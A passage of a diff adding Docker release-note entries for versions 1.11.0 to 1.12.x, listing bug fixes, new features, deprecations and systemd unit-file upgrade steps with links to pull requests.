+- Fix exec's children handling [#26874](https://github.com/docker/docker/pull/26874)
+- Fix exec form of HEALTHCHECK CMD [#26208](https://github.com/docker/docker/pull/26208)
+
+### Networking
+
+- Fix a daemon start panic on armv5 [#24315](https://github.com/docker/docker/issues/24315)
+* Vendor libnetwork [#26879](https://github.com/docker/docker/pull/26879) [#26953](https://github.com/docker/docker/pull/26953)
+ * Avoid returning early on agent join failures [docker/libnetwork#1473](https://github.com/docker/libnetwork/pull/1473)
+ - Fix service published port cleanup issues [docker/libnetwork#1432](https://github.com/docker/libnetwork/pull/1432) [docker/libnetwork#1433](https://github.com/docker/libnetwork/pull/1433)
+ * Recover properly from transient gossip failures [docker/libnetwork#1446](https://github.com/docker/libnetwork/pull/1446)
+ * Disambiguate node names known to gossip cluster to avoid node name collision [docker/libnetwork#1451](https://github.com/docker/libnetwork/pull/1451)
+ * Honor user provided listen address for gossip [docker/libnetwork#1460](https://github.com/docker/libnetwork/pull/1460)
+ * Allow reachability via published port across services on the same host 
[docker/libnetwork#1398](https://github.com/docker/libnetwork/pull/1398) + * Change the ingress sandbox name from random id to just `ingress_sbox` [docker/libnetwork#1449](https://github.com/docker/libnetwork/pull/1449) + - Disable service discovery in ingress network [docker/libnetwork#1489](https://github.com/docker/libnetwork/pull/1489) + +### Swarm Mode + +* Fix remote detection of a node's address when it joins the cluster [#26211](https://github.com/docker/docker/pull/26211) +* Vendor SwarmKit [#26765](https://github.com/docker/docker/pull/26765) + * Bounce session after failed status update [docker/swarmkit#1539](https://github.com/docker/swarmkit/pull/1539) + - Fix possible raft deadlocks [docker/swarmkit#1537](https://github.com/docker/swarmkit/pull/1537) + - Fix panic and endpoint leak when a service is updated with no endpoints [docker/swarmkit#1481](https://github.com/docker/swarmkit/pull/1481) + * Produce an error if the same port is published twice on `service create` or `service update` [docker/swarmkit#1495](https://github.com/docker/swarmkit/pull/1495) + - Fix an issue where changes to a service were not detected, resulting in the service not being updated [docker/swarmkit#1497](https://github.com/docker/swarmkit/pull/1497) + - Do not allow service creation on ingress network [docker/swarmkit#1600](https://github.com/docker/swarmkit/pull/1600) + +### Contrib + +* Update the debian sysv-init script to use `dockerd` instead of `docker daemon` [#25869](https://github.com/docker/docker/pull/25869) +* Improve stability when running the docker client on MacOS Sierra [#26875](https://github.com/docker/docker/pull/26875) +- Fix installation on debian stretch [#27184](https://github.com/docker/docker/pull/27184) + +### Windows + +- Fix an issue where arrow-navigation did not work when running the docker client in ConEmu [#25578](https://github.com/docker/docker/pull/25578) + +## 1.12.1 (2016-08-18) + +**IMPORTANT**: Docker 1.12 ships with an updated systemd 
unit file for rpm +based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When +upgrading from an older version of docker, the upgrade process may not +automatically install the updated version of the unit file, or fail to start +the docker service if; + +- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or +- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive + +Starting the docker service will produce an error: + + Failed to start docker.service: Unit docker.socket failed to load: No such file or directory. + +or + + no sockets found via socket activation: make sure the service was started by systemd. + +To resolve this: + +- Backup the current version of the unit file, and replace the file with the + [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm) +- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present +- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present). + +After making those changes, run `sudo systemctl daemon-reload`, and `sudo +systemctl restart docker` to reload changes and (re)start the docker daemon. 
+
+
+### Client
+
+* Add `Joined at` information in `node inspect --pretty` [#25512](https://github.com/docker/docker/pull/25512)
+- Fix a crash on `service inspect` [#25454](https://github.com/docker/docker/pull/25454)
+- Fix issue preventing `service update --env-add` to work as intended [#25427](https://github.com/docker/docker/pull/25427)
+- Fix issue preventing `service update --publish-add` to work as intended [#25428](https://github.com/docker/docker/pull/25428)
+- Remove `service update --network-add` and `service update --network-rm` flags
+ because this feature is not yet implemented in 1.12, but was inadvertently added
+ to the client in 1.12.0 [#25646](https://github.com/docker/docker/pull/25646)
+
+### Contrib
+
++ Official ARM installation for Debian Jessie, Ubuntu Trusty, and Raspbian Jessie [#24815](https://github.com/docker/docker/pull/24815) [#25637](https://github.com/docker/docker/pull/25637)
+- Add selinux policy per distro/version, fixing issue preventing successful installation on Fedora 24, and Oracle Linux [#25334](https://github.com/docker/docker/pull/25334) [#25593](https://github.com/docker/docker/pull/25593)
+
+### Networking
+
+- Fix issue that prevented containers to be accessed by hostname with Docker overlay driver in Swarm Mode [#25603](https://github.com/docker/docker/pull/25603) [#25648](https://github.com/docker/docker/pull/25648)
+- Fix random network issues on service with published port [#25603](https://github.com/docker/docker/pull/25603)
+- Fix unreliable inter-service communication after scaling down and up [#25603](https://github.com/docker/docker/pull/25603)
+- Fix issue where removing all tasks on a node and adding them back breaks connectivity with other services [#25603](https://github.com/docker/docker/pull/25603)
+- Fix issue where a task that fails to start results in a race, causing a `network xxx not found` error that masks the actual error [#25550](https://github.com/docker/docker/pull/25550)
+- Relax validation 
of SRV records for external services that use SRV records not formatted according to RFC 2782 [#25739](https://github.com/docker/docker/pull/25739) + +### Plugins (experimental) + +* Make daemon events listen for plugin lifecycle events [#24760](https://github.com/docker/docker/pull/24760) +* Check for plugin state before enabling plugin [#25033](https://github.com/docker/docker/pull/25033) +- Remove plugin root from filesystem on `plugin rm` [#25187](https://github.com/docker/docker/pull/25187) +- Prevent deadlock when more than one plugin is installed [#25384](https://github.com/docker/docker/pull/25384) + +### Runtime + +* Mask join tokens in daemon logs [#25346](https://github.com/docker/docker/pull/25346) +- Fix `docker ps --filter` causing the results to no longer be sorted by creation time [#25387](https://github.com/docker/docker/pull/25387) +- Fix various crashes [#25053](https://github.com/docker/docker/pull/25053) + +### Security + +* Add `/proc/timer_list` to the masked paths list to prevent information leak from the host [#25630](https://github.com/docker/docker/pull/25630) +* Allow systemd to run with only `--cap-add SYS_ADMIN` rather than having to also add `--cap-add DAC_READ_SEARCH` or disabling seccomp filtering [#25567](https://github.com/docker/docker/pull/25567) + +### Swarm + +- Fix an issue where the swarm can get stuck electing a new leader after quorum is lost [#25055](https://github.com/docker/docker/issues/25055) +- Fix unwanted rescheduling of containers after a leader failover [#25017](https://github.com/docker/docker/issues/25017) +- Change swarm root CA key to P256 curve [swarmkit#1376](https://github.com/docker/swarmkit/pull/1376) +- Allow forced removal of a node from a swarm [#25159](https://github.com/docker/docker/pull/25159) +- Fix connection leak when a node leaves a swarm [swarmkit/#1277](https://github.com/docker/swarmkit/pull/1277) +- Backdate swarm certificates by one hour to tolerate more clock skew 
[swarmkit/#1243](https://github.com/docker/swarmkit/pull/1243) +- Avoid high CPU use with many unschedulable tasks [swarmkit/#1287](https://github.com/docker/swarmkit/pull/1287) +- Fix issue with global tasks not starting up [swarmkit/#1295](https://github.com/docker/swarmkit/pull/1295) +- Garbage collect raft logs [swarmkit/#1327](https://github.com/docker/swarmkit/pull/1327) + +### Volume + +- Persist local volume options after a daemon restart [#25316](https://github.com/docker/docker/pull/25316) +- Fix an issue where the mount ID was not returned on volume unmount [#25333](https://github.com/docker/docker/pull/25333) +- Fix an issue where a volume mount could inadvertently create a bind mount [#25309](https://github.com/docker/docker/pull/25309) +- `docker service create --mount type=bind,...` now correctly validates if the source path exists, instead of creating it [#25494](https://github.com/docker/docker/pull/25494) + +## 1.12.0 (2016-07-28) + + +**IMPORTANT**: Docker 1.12.0 ships with an updated systemd unit file for rpm +based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When +upgrading from an older version of docker, the upgrade process may not +automatically install the updated version of the unit file, or fail to start +the docker service if; + +- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or +- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive + +Starting the docker service will produce an error: + + Failed to start docker.service: Unit docker.socket failed to load: No such file or directory. + +or + + no sockets found via socket activation: make sure the service was started by systemd. 
+ +To resolve this: + +- Backup the current version of the unit file, and replace the file with the + [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm) +- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present +- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present). + +After making those changes, run `sudo systemctl daemon-reload`, and `sudo +systemctl restart docker` to reload changes and (re)start the docker daemon. + +**IMPORTANT**: With Docker 1.12, a Linux docker installation now has two +additional binaries; `dockerd`, and `docker-proxy`. If you have scripts for +installing docker, please make sure to update them accordingly. + +### Builder + ++ New `HEALTHCHECK` Dockerfile instruction to support user-defined healthchecks [#23218](https://github.com/docker/docker/pull/23218) ++ New `SHELL` Dockerfile instruction to specify the default shell when using the shell form for commands in a Dockerfile [#22489](https://github.com/docker/docker/pull/22489) ++ Add `#escape=` Dockerfile directive to support platform-specific parsing of file paths in Dockerfile [#22268](https://github.com/docker/docker/pull/22268) ++ Add support for comments in `.dockerignore` [#23111](https://github.com/docker/docker/pull/23111) +* Support for UTF-8 in Dockerfiles [#23372](https://github.com/docker/docker/pull/23372) +* Skip UTF-8 BOM bytes from `Dockerfile` and `.dockerignore` if exist [#23234](https://github.com/docker/docker/pull/23234) +* Windows: support for `ARG` to match Linux [#22508](https://github.com/docker/docker/pull/22508) +- Fix error message when building using a daemon with the bridge network disabled [#22932](https://github.com/docker/docker/pull/22932) + +### Contrib + +* Enable seccomp for Centos 7 and Oracle Linux 7 [#22344](https://github.com/docker/docker/pull/22344) 
+- Remove MountFlags in systemd unit to allow shared mount propagation [#22806](https://github.com/docker/docker/pull/22806) + +### Distribution + ++ Add `--max-concurrent-downloads` and `--max-concurrent-uploads` daemon flags useful for situations where network connections don't support multiple downloads/uploads [#22445](https://github.com/docker/docker/pull/22445) +* Registry operations now honor the `ALL_PROXY` environment variable [#22316](https://github.com/docker/docker/pull/22316) +* Provide more information to the user on `docker load` [#23377](https://github.com/docker/docker/pull/23377) +* Always save registry digest metadata about images pushed and pulled [#23996](https://github.com/docker/docker/pull/23996) + +### Logging + ++ Syslog logging driver now supports DGRAM sockets [#21613](https://github.com/docker/docker/pull/21613) ++ Add `--details` option to `docker logs` to also display log tags [#21889](https://github.com/docker/docker/pull/21889) ++ Enable syslog logger to have access to env and labels [#21724](https://github.com/docker/docker/pull/21724) ++ An additional syslog-format option `rfc5424micro` to allow microsecond resolution in syslog timestamp [#21844](https://github.com/docker/docker/pull/21844) +* Inherit the daemon log options when creating containers [#21153](https://github.com/docker/docker/pull/21153) +* Remove `docker/` prefix from log messages tag and replace it with `{{.DaemonName}}` so that users have the option of changing the prefix [#22384](https://github.com/docker/docker/pull/22384) + +### Networking + ++ Built-in Virtual-IP based internal and ingress load-balancing using IPVS [#23361](https://github.com/docker/docker/pull/23361) ++ Routing Mesh using ingress overlay network [#23361](https://github.com/docker/docker/pull/23361) ++ Secured multi-host overlay networking using encrypted control-plane and Data-plane [#23361](https://github.com/docker/docker/pull/23361) ++ MacVlan driver is out of experimental 
[#23524](https://github.com/docker/docker/pull/23524) ++ Add `driver` filter to `network ls` [#22319](https://github.com/docker/docker/pull/22319) ++ Adding `network` filter to `docker ps --filter` [#23300](https://github.com/docker/docker/pull/23300) ++ Add `--link-local-ip` flag to `create`, `run` and `network connect` to specify a container's link-local address [#23415](https://github.com/docker/docker/pull/23415) ++ Add network label filter support [#21495](https://github.com/docker/docker/pull/21495) +* Removed dependency on external KV-Store for Overlay networking in Swarm-Mode [#23361](https://github.com/docker/docker/pull/23361) +* Add container's short-id as default network alias [#21901](https://github.com/docker/docker/pull/21901) +* `run` options `--dns` and `--net=host` are no longer mutually exclusive [#22408](https://github.com/docker/docker/pull/22408) +- Fix DNS issue when renaming containers with generated names [#22716](https://github.com/docker/docker/pull/22716) +- Allow both `network inspect -f {{.Id}}` and `network inspect -f {{.ID}}` to address inconsistency with inspect output [#23226](https://github.com/docker/docker/pull/23226) + +### Plugins (experimental) + ++ New `plugin` command to manager plugins with `install`, `enable`, `disable`, `rm`, `inspect`, `set` subcommands [#23446](https://github.com/docker/docker/pull/23446) + +### Remote API (v1.24) & Client + ++ Split the binary into two: `docker` (client) and `dockerd` (daemon) [#20639](https://github.com/docker/docker/pull/20639) ++ Add `before` and `since` filters to `docker images --filter` [#22908](https://github.com/docker/docker/pull/22908) ++ Add `--limit` option to `docker search` [#23107](https://github.com/docker/docker/pull/23107) ++ Add `--filter` option to `docker search` [#22369](https://github.com/docker/docker/pull/22369) ++ Add security options to `docker info` output [#21172](https://github.com/docker/docker/pull/21172) 
[#23520](https://github.com/docker/docker/pull/23520)
++ Add insecure registries to `docker info` output [#20410](https://github.com/docker/docker/pull/20410)
++ Extend Docker authorization with TLS user information [#21556](https://github.com/docker/docker/pull/21556)
++ devicemapper: expose Minimum Thin Pool Free Space through `docker info` [#21945](https://github.com/docker/docker/pull/21945)
+* API now returns a JSON object when an error occurs making it more consistent [#22880](https://github.com/docker/docker/pull/22880)
+- Prevent `docker run -i --restart` from hanging on exit [#22777](https://github.com/docker/docker/pull/22777)
+- Fix API/CLI discrepancy on hostname validation [#21641](https://github.com/docker/docker/pull/21641)
+- Fix discrepancy in the format of sizes in `stats` from HumanSize to BytesSize [#21773](https://github.com/docker/docker/pull/21773)
+- authz: when request is denied return forbidden exit code (403) [#22448](https://github.com/docker/docker/pull/22448)
+- Windows: fix tty-related displaying issues [#23878](https://github.com/docker/docker/pull/23878)
+
+### Runtime
+
++ Split the userland proxy to a separate binary (`docker-proxy`) [#23312](https://github.com/docker/docker/pull/23312)
++ Add `--live-restore` daemon flag to keep containers running when daemon shuts down, and regain control on startup [#23213](https://github.com/docker/docker/pull/23213)
++ Ability to add OCI-compatible runtimes (via `--add-runtime` daemon flag) and select one with `--runtime` on `create` and `run` [#22983](https://github.com/docker/docker/pull/22983)
++ New `overlay2` graphdriver for Linux 4.0+ with multiple lower directory support [#22126](https://github.com/docker/docker/pull/22126)
++ New load/save image events [#22137](https://github.com/docker/docker/pull/22137)
++ Add support for reloading daemon configuration through systemd [#22446](https://github.com/docker/docker/pull/22446)
++ Add disk quota support for btrfs 
[#19651](https://github.com/docker/docker/pull/19651) ++ Add disk quota support for zfs [#21946](https://github.com/docker/docker/pull/21946) ++ Add support for `docker run --pid=container:` [#22481](https://github.com/docker/docker/pull/22481) ++ Align default seccomp profile with selected capabilities [#22554](https://github.com/docker/docker/pull/22554) ++ Add a `daemon reload` event when the daemon reloads its configuration [#22590](https://github.com/docker/docker/pull/22590) ++ Add `trace` capability in the pprof profiler to show execution traces in binary form [#22715](https://github.com/docker/docker/pull/22715) ++ Add a `detach` event [#22898](https://github.com/docker/docker/pull/22898) ++ Add support for setting sysctls with `--sysctl` [#19265](https://github.com/docker/docker/pull/19265) ++ Add `--storage-opt` flag to `create` and `run` allowing to set `size` on devicemapper [#19367](https://github.com/docker/docker/pull/19367) ++ Add `--oom-score-adjust` daemon flag with a default value of `-500` making the daemon less likely to be killed before containers [#24516](https://github.com/docker/docker/pull/24516) +* Undeprecate the `-c` short alias of `--cpu-shares` on `run`, `build`, `create`, `update` [#22621](https://github.com/docker/docker/pull/22621) +* Prevent from using aufs and overlay graphdrivers on an eCryptfs mount [#23121](https://github.com/docker/docker/pull/23121) +- Fix issues with tmpfs mount ordering [#22329](https://github.com/docker/docker/pull/22329) +- Created containers are no longer listed on `docker ps -a -f exited=0` [#21947](https://github.com/docker/docker/pull/21947) +- Fix an issue where containers are stuck in a "Removal In Progress" state [#22423](https://github.com/docker/docker/pull/22423) +- Fix bug that was returning an HTTP 500 instead of a 400 when not specifying a command on run/create [#22762](https://github.com/docker/docker/pull/22762) +- Fix bug with `--detach-keys` whereby input matching a prefix of the detach 
key was not preserved [#22943](https://github.com/docker/docker/pull/22943) +- SELinux labeling is now disabled when using `--privileged` mode [#22993](https://github.com/docker/docker/pull/22993) +- If volume-mounted into a container, `/etc/hosts`, `/etc/resolv.conf`, `/etc/hostname` are no longer SELinux-relabeled [#22993](https://github.com/docker/docker/pull/22993) +- Fix inconsistency in `--tmpfs` behavior regarding mount options [#22438](https://github.com/docker/docker/pull/22438) +- Fix an issue where daemon hangs at startup [#23148](https://github.com/docker/docker/pull/23148) +- Ignore SIGPIPE events to prevent journald restarts to crash docker in some cases [#22460](https://github.com/docker/docker/pull/22460) +- Containers are not removed from stats list on error [#20835](https://github.com/docker/docker/pull/20835) +- Fix `on-failure` restart policy when daemon restarts [#20853](https://github.com/docker/docker/pull/20853) +- Fix an issue with `stats` when a container is using another container's network [#21904](https://github.com/docker/docker/pull/21904) + +### Swarm Mode + ++ New `swarm` command to manage swarms with `init`, `join`, `join-token`, `leave`, `update` subcommands [#23361](https://github.com/docker/docker/pull/23361) [#24823](https://github.com/docker/docker/pull/24823) ++ New `service` command to manage swarm-wide services with `create`, `inspect`, `update`, `rm`, `ps` subcommands [#23361](https://github.com/docker/docker/pull/23361) [#25140](https://github.com/docker/docker/pull/25140) ++ New `node` command to manage nodes with `accept`, `promote`, `demote`, `inspect`, `update`, `ps`, `ls` and `rm` subcommands [#23361](https://github.com/docker/docker/pull/23361) [#25140](https://github.com/docker/docker/pull/25140) ++ (experimental) New `stack` and `deploy` commands to manage and deploy multi-service applications [#23522](https://github.com/docker/docker/pull/23522) [#25140](https://github.com/docker/docker/pull/25140) + +### Volume 
+ ++ Add support for local and global volume scopes (analogous to network scopes) [#22077](https://github.com/docker/docker/pull/22077) ++ Allow volume drivers to provide a `Status` field [#21006](https://github.com/docker/docker/pull/21006) ++ Add name/driver filter support for volume [#21361](https://github.com/docker/docker/pull/21361) +* Mount/Unmount operations now receives an opaque ID to allow volume drivers to differentiate between two callers [#21015](https://github.com/docker/docker/pull/21015) +- Fix issue preventing to remove a volume in a corner case [#22103](https://github.com/docker/docker/pull/22103) +- Windows: Enable auto-creation of host-path to match Linux [#22094](https://github.com/docker/docker/pull/22094) + + +### DEPRECATION +* Environment variables `DOCKER_CONTENT_TRUST_OFFLINE_PASSPHRASE` and `DOCKER_CONTENT_TRUST_TAGGING_PASSPHRASE` have been renamed + to `DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE` and `DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE` respectively [#22574](https://github.com/docker/docker/pull/22574) +* Remove deprecated `syslog-tag`, `gelf-tag`, `fluentd-tag` log option in favor of the more generic `tag` one [#22620](https://github.com/docker/docker/pull/22620) +* Remove deprecated feature of passing HostConfig at API container start [#22570](https://github.com/docker/docker/pull/22570) +* Remove deprecated `-f`/`--force` flag on docker tag [#23090](https://github.com/docker/docker/pull/23090) +* Remove deprecated `/containers//copy` endpoint [#22149](https://github.com/docker/docker/pull/22149) +* Remove deprecated `docker ps` flags `--since` and `--before` [#22138](https://github.com/docker/docker/pull/22138) +* Deprecate the old 3-args form of `docker import` [#23273](https://github.com/docker/docker/pull/23273) + +## 1.11.2 (2016-05-31) + +### Networking + +- Fix a stale endpoint issue on overlay networks during ungraceful restart ([#23015](https://github.com/docker/docker/pull/23015)) +- Fix an issue where the wrong port 
could be reported by `docker inspect/ps/port` ([#22997](https://github.com/docker/docker/pull/22997)) + +### Runtime + +- Fix a potential panic when running `docker build` ([#23032](https://github.com/docker/docker/pull/23032)) +- Fix interpretation of `--user` parameter ([#22998](https://github.com/docker/docker/pull/22998)) +- Fix a bug preventing container statistics to be correctly reported ([#22955](https://github.com/docker/docker/pull/22955)) +- Fix an issue preventing container to be restarted after daemon restart ([#22947](https://github.com/docker/docker/pull/22947)) +- Fix issues when running 32 bit binaries on Ubuntu 16.04 ([#22922](https://github.com/docker/docker/pull/22922)) +- Fix a possible deadlock on image deletion and container attach ([#22918](https://github.com/docker/docker/pull/22918)) +- Fix an issue where containers fail to start after a daemon restart if they depend on a containerized cluster store ([#22561](https://github.com/docker/docker/pull/22561)) +- Fix an issue causing `docker ps` to hang on CentOS when using devicemapper ([#22168](https://github.com/docker/docker/pull/22168), [#23067](https://github.com/docker/docker/pull/23067)) +- Fix a bug preventing to `docker exec` into a container when using devicemapper ([#22168](https://github.com/docker/docker/pull/22168), [#23067](https://github.com/docker/docker/pull/23067)) + + +## 1.11.1 (2016-04-26) + +### Distribution + +- Fix schema2 manifest media type to be of type `application/vnd.docker.container.image.v1+json` ([#21949](https://github.com/docker/docker/pull/21949)) + +### Documentation + ++ Add missing API documentation for changes introduced with 1.11.0 ([#22048](https://github.com/docker/docker/pull/22048)) + +### Builder + +* Append label passed to `docker build` as arguments as an implicit `LABEL` command at the end of the processed `Dockerfile` ([#22184](https://github.com/docker/docker/pull/22184)) + +### Networking + +- Fix a panic that would occur when forwarding DNS 
query ([#22261](https://github.com/docker/docker/pull/22261))
+- Fix an issue where OS threads could end up within an incorrect network namespace when using user defined networks ([#22261](https://github.com/docker/docker/pull/22261))
+
+### Runtime
+
+- Fix a bug preventing labels configuration to be reloaded via the config file ([#22299](https://github.com/docker/docker/pull/22299))
+- Fix a regression where container mounting `/var/run` would prevent other containers from being removed ([#22256](https://github.com/docker/docker/pull/22256))
+- Fix an issue where it would be impossible to update both `memory-swap` and `memory` value together ([#22255](https://github.com/docker/docker/pull/22255))
+- Fix a regression from 1.11.0 where the `/auth` endpoint would not initialize `serveraddress` if it is not provided ([#22254](https://github.com/docker/docker/pull/22254))
+- Add missing cleanup of container temporary files when cancelling a schedule restart ([#22237](https://github.com/docker/docker/pull/22237))
+- Remove scary error message when no restart policy is specified ([#21993](https://github.com/docker/docker/pull/21993))
+- Fix a panic that would occur when the plugins were activated via the json spec ([#22191](https://github.com/docker/docker/pull/22191))
+- Fix restart backoff logic to correctly reset delay if container ran for at least 10secs ([#22125](https://github.com/docker/docker/pull/22125))
+- Remove error message when a container restart get cancelled ([#22123](https://github.com/docker/docker/pull/22123))
+- Fix an issue where `docker` would not correctly clean up after `docker exec` ([#22121](https://github.com/docker/docker/pull/22121))
+- Fix a panic that could occur when serving concurrent `docker stats` commands ([#22120](https://github.com/docker/docker/pull/22120))
+- Revert deprecation of non-existent host directories auto-creation ([#22065](https://github.com/docker/docker/pull/22065))
+- Hide misleading rpc error on daemon shutdown 
([#22058](https://github.com/docker/docker/pull/22058)) + +## 1.11.0 (2016-04-13) + +**IMPORTANT**: With Docker 1.11, a Linux docker installation is now made of 4 binaries (`docker`, [`docker-containerd`](https://github.com/docker/containerd), [`docker-containerd-shim`](https://github.com/docker/containerd) and [`docker-runc`](https://github.com/opencontainers/runc)). If you have scripts relying on docker being a single static binaries, please make sure to update them. Interaction with the daemon stay the same otherwise, the usage of the other binaries should be transparent. A Windows docker installation remains a single binary, `docker.exe`. + +### Builder + +- Fix a bug where Docker would not use the correct uid/gid when processing the `WORKDIR` command ([#21033](https://github.com/docker/docker/pull/21033)) +- Fix a bug where copy operations with userns would not use the proper uid/gid ([#20782](https://github.com/docker/docker/pull/20782), [#21162](https://github.com/docker/docker/pull/21162)) + +### Client + +* Usage of the `:` separator for security option has been deprecated. 
`=` should be used instead ([#21232](https://github.com/docker/docker/pull/21232)) ++ The client user agent is now passed to the registry on `pull`, `build`, `push`, `login` and `search` operations ([#21306](https://github.com/docker/docker/pull/21306), [#21373](https://github.com/docker/docker/pull/21373)) +* Allow setting the Domainname and Hostname separately through the API ([#20200](https://github.com/docker/docker/pull/20200)) +* Docker info will now warn users if it can not detect the kernel version or the operating system ([#21128](https://github.com/docker/docker/pull/21128)) +- Fix an issue where `docker stats --no-stream` output could be all 0s ([#20803](https://github.com/docker/docker/pull/20803)) +- Fix a bug where some newly started container would not appear in a running `docker stats` command ([#20792](https://github.com/docker/docker/pull/20792)) +* Post processing is no longer enabled for linux-cgo terminals ([#20587](https://github.com/docker/docker/pull/20587)) +- Values to `--hostname` are now refused if they do not comply with [RFC1123](https://tools.ietf.org/html/rfc1123) ([#20566](https://github.com/docker/docker/pull/20566)) ++ Docker learned how to use a SOCKS proxy ([#20366](https://github.com/docker/docker/pull/20366), [#18373](https://github.com/docker/docker/pull/18373)) ++ Docker now supports external credential stores ([#20107](https://github.com/docker/docker/pull/20107)) +* `docker ps` now supports displaying the list of volumes mounted inside a container ([#20017](https://github.com/docker/docker/pull/20017)) +* `docker info` now also reports Docker's root directory location ([#19986](https://github.com/docker/docker/pull/19986)) +- Docker now prohibits login in with an empty username (spaces are trimmed) ([#19806](https://github.com/docker/docker/pull/19806)) +* Docker events attributes are now sorted by key ([#19761](https://github.com/docker/docker/pull/19761)) +* `docker ps` no longer shows exported port for stopped 
containers ([#19483](https://github.com/docker/docker/pull/19483)) +- Docker now cleans after itself if a save/export command fails ([#17849](https://github.com/docker/docker/pull/17849)) +* Docker load learned how to display a progress bar ([#17329](https://github.com/docker/docker/pull/17329), [#20078](https://github.com/docker/docker/pull/20078)) + +### Distribution + +- Fix a panic that occurred when pulling an image with 0 layers ([#21222](https://github.com/docker/docker/pull/21222)) +- Fix a panic that could occur on error while pushing to a registry with a misconfigured token service ([#21212](https://github.com/docker/docker/pull/21212)) ++ All first-level delegation roles are now signed when doing a trusted push ([#21046](https://github.com/docker/docker/pull/21046)) ++ OAuth support for registries was added ([#20970](https://github.com/docker/docker/pull/20970)) +* `docker login` now handles token using the implementation found in [docker/distribution](https://github.com/docker/distribution) ([#20832](https://github.com/docker/docker/pull/20832)) +* `docker login` will no longer prompt for an email ([#20565](https://github.com/docker/docker/pull/20565)) +* Docker will now fall back to registry V1 if no basic auth credentials are available ([#20241](https://github.com/docker/docker/pull/20241)) +* Docker will now try to resume layer download where it left off after a network error/timeout ([#19840](https://github.com/docker/docker/pull/19840)) +- Fix generated manifest mediaType when pushing cross-repository ([#19509](https://github.com/docker/docker/pull/19509)) +- Fix docker requesting additional push credentials when pulling an image if Content Trust is enabled ([#20382](https://github.com/docker/docker/pull/20382)) + +### Logging + +- Fix a race in the journald log driver ([#21311](https://github.com/docker/docker/pull/21311)) +* Docker syslog driver now uses the RFC-5424 format when emitting logs 
([#20121](https://github.com/docker/docker/pull/20121)) +* Docker GELF log driver now allows to specify the compression algorithm and level via the `gelf-compression-type` and `gelf-compression-level` options ([#19831](https://github.com/docker/docker/pull/19831)) +* Docker daemon learned to output uncolorized logs via the `--raw-logs` options ([#19794](https://github.com/docker/docker/pull/19794)) ++ Docker, on Windows platform, now includes an ETW (Event Tracing in Windows) logging driver named `etwlogs` ([#19689](https://github.com/docker/docker/pull/19689)) +* Journald log driver learned how to handle tags ([#19564](https://github.com/docker/docker/pull/19564)) ++ The fluentd log driver learned the following options: `fluentd-address`, `fluentd-buffer-limit`, `fluentd-retry-wait`, `fluentd-max-retries` and `fluentd-async-connect` ([#19439](https://github.com/docker/docker/pull/19439)) ++ Docker learned to send log to Google Cloud via the new `gcplogs` logging driver. ([#18766](https://github.com/docker/docker/pull/18766)) + + +### Misc + ++ When saving linked images together with `docker save` a subsequent `docker load` will correctly restore their parent/child relationship ([#21385](https://github.com/docker/docker/pull/21385)) ++ Support for building the Docker cli for OpenBSD was added ([#21325](https://github.com/docker/docker/pull/21325)) ++ Labels can now be applied at network, volume and image creation ([#21270](https://github.com/docker/docker/pull/21270)) +* The `dockremap` is now created as a system user ([#21266](https://github.com/docker/docker/pull/21266)) +- Fix a few response body leaks ([#21258](https://github.com/docker/docker/pull/21258)) +- Docker, when run as a service with systemd, will now properly manage its processes cgroups ([#20633](https://github.com/docker/docker/pull/20633)) +* `docker info` now reports the value of cgroup KernelMemory or emits a warning if it is not supported ([#20863](https://github.com/docker/docker/pull/20863)) 
+* `docker info` now also reports the cgroup driver in use ([#20388](https://github.com/docker/docker/pull/20388)) +* Docker completion is now available on PowerShell ([#19894](https://github.com/docker/docker/pull/19894)) +* `dockerinit` is no more ([#19490](https://github.com/docker/docker/pull/19490),[#19851](https://github.com/docker/docker/pull/19851)) ++ Support for building Docker on arm64 was added ([#19013](https://github.com/docker/docker/pull/19013)) ++ Experimental support for building docker.exe in a native Windows Docker installation ([#18348](https://github.com/docker/docker/pull/18348)) + +### Networking + +- Fix panic if a node is forcibly removed from the cluster ([#21671](https://github.com/docker/docker/pull/21671)) +- Fix "error creating vxlan interface" when starting a container in a Swarm cluster ([#21671](https://github.com/docker/docker/pull/21671)) +* `docker network inspect` will now report all endpoints whether they have an active container or not ([#21160](https://github.com/docker/docker/pull/21160)) ++ Experimental support for the MacVlan and IPVlan network drivers has been added ([#21122](https://github.com/docker/docker/pull/21122)) +* Output of `docker network ls` is now sorted by network name ([#20383](https://github.com/docker/docker/pull/20383)) +- Fix a bug where Docker would allow a network to be created with the reserved `default` name ([#19431](https://github.com/docker/docker/pull/19431)) +* `docker network inspect` returns whether a network is internal or not ([#19357](https://github.com/docker/docker/pull/19357)) ++ Control IPv6 via explicit option when creating a network (`docker network create --ipv6`). 
This shows up as a new `EnableIPv6` field in `docker network inspect` ([#17513](https://github.com/docker/docker/pull/17513)) +* Support for AAAA Records (aka IPv6 Service Discovery) in embedded DNS Server ([#21396](https://github.com/docker/docker/pull/21396)) +- Fix to not forward docker domain IPv6 queries to external servers ([#21396](https://github.com/docker/docker/pull/21396)) +* Multiple A/AAAA records from embedded DNS Server for DNS Round robin ([#21019](https://github.com/docker/docker/pull/21019)) +- Fix endpoint count inconsistency after an ungraceful daemon restart ([#21261](https://github.com/docker/docker/pull/21261)) +- Move the ownership of exposed ports and port-mapping options from Endpoint to Sandbox ([#21019](https://github.com/docker/docker/pull/21019)) +- Fixed a bug which prevents docker reload when host is configured with ipv6.disable=1 ([#21019](https://github.com/docker/docker/pull/21019)) +- Added inbuilt nil IPAM driver ([#21019](https://github.com/docker/docker/pull/21019)) +- Fixed bug in iptables.Exists() logic [#21019](https://github.com/docker/docker/pull/21019) +- Fixed a Veth interface leak when using overlay network 